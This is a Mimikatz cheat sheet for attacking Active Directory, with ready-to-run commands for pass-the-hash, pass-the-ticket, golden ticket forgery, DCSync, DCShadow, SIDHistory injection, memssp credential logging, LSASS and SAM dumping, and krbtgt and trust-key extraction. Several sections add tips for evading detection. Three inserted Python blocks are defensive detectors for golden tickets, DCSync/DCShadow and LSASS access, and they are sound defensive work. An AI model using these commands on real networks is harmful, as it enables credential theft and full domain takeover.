Using Mimikatz

OverPass-the-Hash

Mimikatz can perform the well-known operation “OverPass-The-Hash” to run a process under the security context of another account’s credentials.

This is extremely powerful and should not be underestimated. Behind the scenes, the supplied NTLM hash is used as the Kerberos key to request a ticket (TGT) from the domain controller. That ticket then authenticates to any Kerberos service in the domain: for example, use sekurlsa::pth to start PowerShell and you can perform lateral movement via PsExec, WMI, WinRM, etc. without ever knowing the plaintext password.

OverPass-the-Hash can also be used to impersonate a machine account, which has some interesting use cases (see https://blog.secarma.co.uk/labs/using-machine-account-passwords-during-an-engagement). That blog describes a scenario where a machine was compromised and its machine account NTLM hash captured. The machine was later taken offline but turned out to be the only path to Domain Admin. The solution was to use sekurlsa::pth to impersonate the machine account and perform the required operations from another host.

sekurlsa::pth /user:manager /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell
sekurlsa::pth /user:WIN2008R2$ /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell

Pass-The-Ticket

After a Kerberos ticket is found, it can be copied to another system and passed into the current logon session, effectively simulating a logon without any communication with the Domain Controller. No special privileges are required.

/filename – the ticket's filename (can be given multiple times)
/directory – a directory path; all .kirbi files inside it will be injected
kerberos::ptt /filename:"theTicket.kirbi" OR kerberos::ptt /directory:"C:"

Kerberos Golden SID-Hopping Ticket

Once the krbtgt hash of a single domain (i.e. a single Domain Controller) within a forest is compromised, the entire forest is compromised. Mimikatz can create a SID-hopping Golden Ticket, a forged TGT carrying extra SIDs from the forest root, to authenticate to all domains within the forest.

/user: any user in the child domain
/domain: child domain FQDN
/sid: SID of the child domain
/krbtgt: KRBTGT hash for the child domain
/sids: SID of the Enterprise Admins group (forest root domain SID plus RID 519)
/ptt: optional, load the ticket into the current session
kerberos::golden /user:manager /domain:fortress.citadel.local /sid:S-1-5-21-3702248245-3669926273-3383077842 /krbtgt:FFB91205A3D288362D86C529728B9DC0 /sids:S-1-5-21-2244208837-681476370-1982983775-519 /ptt
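
A Golden Ticket is forged offline from the krbtgt hash, so no domain controller ever issued it: the first trace the KDC sees is a service ticket request (Security event 4769) for a TGT it has no 4768 record of. The Python below is an added detection example, not part of the original page or of Mimikatz. It correlates 4768 and 4769 per (account, client address) and additionally flags 4769 events for accounts that do not exist in the directory, since the /user value in a forged ticket can be any name. The event records, the account list and the 10 hour window (the default maximum TGT lifetime) are constructed assumptions; a TGT issued by a different DC than the one whose log you are reading also produces a 4769 without a local 4768, so logs from all DCs should be merged first.

```python
"""Find service-ticket requests (4769) that no TGT request (4768) explains.

A forged TGT (Golden Ticket) is never issued by a DC, so the DC sees a
TGS-REQ (4769) from a client that never obtained a TGT (4768) for that
account. This correlates the two per (account, client address). A second
check flags 4769 events naming accounts that do not exist, because a forged
TGT can carry any user name. Sample events and the account list are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set, Tuple


@dataclass(frozen=True)
class KerbEvent:
    event_id: int        # 4768 = TGT issued, 4769 = service ticket issued
    ts: datetime         # TimeCreated
    account: str         # TargetUserName without the @REALM suffix
    client_ip: str       # IpAddress
    service: str = ""    # ServiceName (4769 only)


def find_unexplained_tgs(
    events: Iterable[KerbEvent],
    known_accounts: Set[str],
    window: timedelta = timedelta(hours=10),   # assumed: domain's maximum TGT lifetime
) -> List[Tuple[KerbEvent, List[str]]]:
    """Return (event, reasons) for every 4769 with no 4768 in the window
    from the same client for the same account, or for an unknown account."""
    last_tgt: Dict[Tuple[str, str], datetime] = {}
    findings: List[Tuple[KerbEvent, List[str]]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.account.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.ts          # remember the most recent TGT per client/account
            continue
        if ev.event_id != 4769:
            continue
        reasons = []
        issued = last_tgt.get(key)
        if issued is None or ev.ts - issued > window:
            reasons.append("no 4768 for this account from this client within the TGT lifetime")
        if ev.account.lower() not in known_accounts:
            reasons.append("account does not exist in the directory")
        if reasons:
            findings.append((ev, reasons))
    return findings


# Constructed sample data: alice is normal, bob's TGT is far older than the
# lifetime, and "manager" never obtained a TGT and is not a real account.
T0 = datetime(2021, 6, 1, 9, 0, 0)
KNOWN_ACCOUNTS = {"alice", "bob", "svc_sql"}
SAMPLE_EVENTS = [
    KerbEvent(4768, T0, "alice", "10.0.0.5"),
    KerbEvent(4769, T0 + timedelta(minutes=5), "alice", "10.0.0.5", "cifs/fs01.chaos.local"),
    KerbEvent(4768, T0 - timedelta(days=2), "bob", "10.0.0.7"),
    KerbEvent(4769, T0 + timedelta(minutes=12), "bob", "10.0.0.7", "ldap/dc01.chaos.local"),
    KerbEvent(4769, T0 + timedelta(minutes=20), "manager", "10.0.0.9", "cifs/dc01.chaos.local"),
]

if __name__ == "__main__":
    for ev, reasons in find_unexplained_tgs(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{ev.ts:%H:%M} {ev.account}@{ev.client_ip} -> {ev.service}: {'; '.join(reasons)}")
```

The extra SIDs added with /sids are not visible in 4768/4769 fields, so for SID-hopping the same correlation is applied on the parent domain's DCs: a child-domain account requesting service tickets there with no TGT history anywhere in the forest is the signal.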

ChangeNTLM (Updating Passwords)

There are rare scenarios where you know a user's NTLM hash and need their password but are unable to crack the hash. With Mimikatz you can change the user's password to a value you control and then change it back without them knowing. This is also useful when you compromise an account with an expired password: Mimikatz can be used to update the password without elevated privileges. Use net user $username /domain to check whether the account is allowed to change its password (it almost always is) and when the password was last set, i.e. whether the user has changed it since the NTLM hash was obtained.

lsadump::changentlm /server:dc.lab.local /user:sample [/oldntlm OR /oldpassword] [/newntlm OR /newpassword] 
lsadump::changentlm /server:dc.lab.local /user:sample /oldntlm:FFB91205A3D288362D86C529728B9DC0 /newpassword:kiwi 
lsadump::changentlm /server:dc.lab.local /user:sample /oldpassword:kiwi /newntlm:FFB91205A3D288362D86C529728B9DC0

DCSync

Uses directory replication privileges (Domain Admins have these by default) to synchronise any account's credential material, including the NTLM hash, from a Domain Controller.

lsadump::dcsync /domain:chaos.local /user:CHAOS\Administrator
lsadump::dcsync /domain:chaos.local /all /csv

Dump an object using its GUID

Dumping trust keys using DCSync: list the trustedDomain objects with PowerShell to obtain their GUIDs, then DCSync the object by GUID.

Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | Select name,objectguid
lsadump::dcsync /guid:{aaa17f7f-715d-4e99-b613-1d9ae7ffee0f}

DCShadow

DCShadow registers a rogue Domain Controller and pushes changes through replication, allowing the modification, creation and deletion of objects, object metadata and schema without the usual directory change logging. See: https://www.dcshadow.com/

lsadump::dcshadow /object:"whatever" /attribute:"" /value:"" 
lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local /attribute:description /value:"DCShadow was here!" 
lsadump::dcshadow /push

See also: http://www.labofapenetrationtester.com/2018/04/dcshadow.html

SIDHistory

Very useful, and also mentioned in the DCShadow presentation. Set the SIDHistory attribute of an account to the SID of a high-privilege group such as Domain Admins or Enterprise Admins and the account has the highest privileges without any change to group membership or ACLs.

lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519
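
The DCSync, DCShadow and SIDHistory sections above each leave a different trace in the Security log of a real Domain Controller: DCSync exercises the replication extended rights (event 4662 with a control-access mask and the replication right GUIDs, by an account that is not a DC); DCShadow must first add the service principal names a DC advertises ("GC/..." and the Directory Replication Service SPN class GUID) to the computer account it abuses (event 4742); and a SIDHistory change through the normal write path raises event 4765. The Python below is an added example of that classification, not part of the original page or of Mimikatz. The replication right GUIDs and the DRS SPN class GUID are the real AD values; the DC allowlist and the event records are constructed. A sIDHistory value pushed by DCShadow replication bypasses the 4765 path, which is why the 4742 registration check matters.

```python
"""Classify replication-related Security events (DCSync, DCShadow, SIDHistory).

Events are dicts keyed by the event's XML data names. Sample events and the
DC allowlist are constructed; the GUIDs are the real Active Directory values.
"""
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Extended rights a DCSync exercises (object-type GUIDs from the AD schema).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# SPN class that every DC registers for the Directory Replication Service.
DRS_SPN_CLASS = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"
CONTROL_ACCESS = 0x100  # AccessMask bit meaning "extended right was used"


def classify(ev: Dict[str, str], known_dcs: Set[str]) -> Optional[str]:
    """Return a finding string for a suspicious event, or None."""
    eid = int(ev["EventID"])
    if eid == 4662:
        actor = ev.get("SubjectUserName", "").lower()
        props = ev.get("Properties", "").lower()
        mask = int(ev.get("AccessMask", "0"), 16)
        if (mask & CONTROL_ACCESS and actor not in known_dcs
                and any(g in props for g in REPLICATION_RIGHTS)):
            return f"DCSync: {actor} exercised directory replication rights"
    elif eid == 4742:
        target = ev.get("TargetUserName", "").lower()
        spns = ev.get("ServicePrincipalNames", "").lower()
        if target not in known_dcs and ("gc/" in spns or DRS_SPN_CLASS in spns):
            return f"DCShadow: domain controller SPNs added to {target}"
    elif eid == 4765:
        return f"SIDHistory: SID History added to {ev.get('TargetUserName', '?')}"
    return None


def scan(events: Iterable[Dict[str, str]], known_dcs: Set[str]) -> List[Tuple[str, str]]:
    """Return (EventRecordID, finding) for every event that classifies."""
    out = []
    for ev in events:
        finding = classify(ev, known_dcs)
        if finding:
            out.append((ev["EventRecordID"], finding))
    return out


# Constructed allowlist: machine accounts of the real DCs (lower-case).
KNOWN_DCS = {"dc01$", "dc02$"}

# Constructed sample events (the GUID after the DRS SPN class is a placeholder).
SAMPLE_EVENTS = [
    {"EventID": "4662", "EventRecordID": "1", "SubjectUserName": "backupsvc",
     "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "EventRecordID": "2", "SubjectUserName": "DC02$",
     "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4742", "EventRecordID": "3", "TargetUserName": "DESKTOP-WARDOG$",
     "ServicePrincipalNames": "GC/desktop-wardog.chaos.local/chaos.local "
                              "E3514235-4B06-11D1-AB04-00C04FC2DCD2/"
                              "00000000-0000-0000-0000-000000000000/chaos.local"},
    {"EventID": "4765", "EventRecordID": "4", "TargetUserName": "helpdeskuser"},
    {"EventID": "4624", "EventRecordID": "5", "TargetUserName": "alice"},
]

if __name__ == "__main__":
    for record_id, finding in scan(SAMPLE_EVENTS, KNOWN_DCS):
        print(record_id, finding)
```

Auditing of event 4662 requires "Audit Directory Service Access" to be enabled on the DCs; without it the DCSync branch has nothing to read. The NetSync section below also shows why the allowlist must be exact: a legitimate DC machine account performing replication is expected and is deliberately not reported.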

NetSync

NetSync is a legacy protocol and should only really be used when you think DCSync will get detected. It is more limited than DCSync: it can only synchronise machine accounts, and only a machine account can be used to perform the operation.

lsadump::netsync /dc:chaos.local /user:dc$ /ntlm:FFB91205A3D288362D86C529728B9DC0 /account:DESKTOP-WARDOG$

Log Credentials to File (Bypassing Credential Guard)

privilege::debug
misc::memssp

Credentials are written to the file C:\Windows\System32\mimilsa.log.

Dump Passwords (Memory and Registry)

The sekurlsa::logonpasswords module lists all available credential material held by the default Microsoft Windows authentication packages: msv, wdigest, tspkg, ssp, credman, ekeys, etc. Mimikatz cannot dump credential material held by custom third-party packages, as the memory offsets for those are not known.

sekurlsa::logonpasswords 
sekurlsa::ekeys
lsadump::sam
lsadump::cache
lsadump::secrets
ts::logonpasswords 
ts::mstsc 
vault::list
vault::cred
dpapi::wifi 
dpapi::wwan

NTLM hashes can be used to perform Pass-the-Hash attacks against services that support NTLM authentication, or to request a Kerberos ticket for Kerberos services. The most common scenarios include PsExec, WMI and WinRM.

From a memory dump of LSASS:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
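
Whether credentials are read live (sekurlsa::logonpasswords) or from a minidump (sekurlsa::minidump) taken earlier, something had to open a handle to lsass.exe with PROCESS_VM_READ, and Sysmon records that as event 10 (ProcessAccess). The Python below is an added detection example, not part of the original page or of Mimikatz. It checks the VM_READ bit of GrantedAccess rather than matching exact masks, so it catches both the 0x1010 that Mimikatz commonly requests and the full-access masks that dump tools request, and it exempts an allowlist of processes that legitimately read LSASS; the allowlist and the event records are constructed.

```python
"""Flag LSASS memory reads in Sysmon event 10 (ProcessAccess) records.

Live dumping and minidump creation both need a handle to lsass.exe that
includes PROCESS_VM_READ. Instead of matching exact GrantedAccess values,
the check tests that bit and exempts a (constructed) allowlist of processes
that legitimately read LSASS, such as the AV engine. A call trace that
contains "UNKNOWN" (code not backed by a module on disk) is reported as an
extra reason. Events are dicts keyed by Sysmon's field names; samples are constructed.
"""
from typing import Dict, Iterable, List, Tuple

PROCESS_VM_READ = 0x0010          # from the Win32 process access rights
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed allowlist of lower-case image paths allowed to read LSASS.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def lsass_access_reasons(ev: Dict[str, str], allowlist=ALLOWLIST) -> List[str]:
    """Return the reasons this event is suspicious; empty list if it is not."""
    target = ev.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return []
    source = ev.get("SourceImage", "").lower()
    if source in allowlist:
        return []
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    reasons = []
    if granted & PROCESS_VM_READ:
        reasons.append(f"{ev['SourceImage']} opened lsass.exe with PROCESS_VM_READ "
                       f"(GrantedAccess {ev['GrantedAccess']})")
    if granted == PROCESS_ALL_ACCESS:
        reasons.append("full access (0x1fffff) requested, typical of dump tools")
    if "unknown" in ev.get("CallTrace", "").lower():
        reasons.append("call trace includes code not backed by a module on disk")
    return reasons


def scan_lsass_access(events: Iterable[Dict[str, str]]) -> List[Tuple[Dict[str, str], List[str]]]:
    """Return (event, reasons) for every event that has at least one reason."""
    out = []
    for ev in events:
        reasons = lsass_access_reasons(ev)
        if reasons:
            out.append((ev, reasons))
    return out


LSASS = r"C:\Windows\System32\lsass.exe"
# Constructed sample events.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Users\alice\Downloads\mimikatz.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(0000000000000000)"},
]

if __name__ == "__main__":
    for ev, reasons in scan_lsass_access(SAMPLE_EVENTS):
        print(ev["SourceImage"], "->", "; ".join(reasons))
```

The allowlist is the weak point of any such rule: keep it to full paths of signed binaries, and treat a non-allowlisted process that opens LSASS for reading as worth a look even when the requesting image has an innocuous name, as the third and fifth samples illustrate.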

Dump Domain Controller Credentials

Asks the LSA server on a Domain Controller to retrieve the SAM/AD credential data, either normally, by patching LSASS on the fly (/patch) or by injecting into it (/inject). Use /patch for a subset of the data and /inject for everything. Requires SYSTEM or debug rights on a Domain Controller. The /patch method should be considered more OPSEC safe. See:

https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html

Omit /name to dump all hashes.

lsadump::lsa /inject /name:krbtgt
lsadump::lsa /patch /name:krbtgt
sekurlsa::krbtgt

Dump Domain Controller Trust Keys

Extracts the data Active Directory holds for the domain's existing trust relationships. The trust key (the trust account's password) is displayed as well.

lsadump::trust /patch
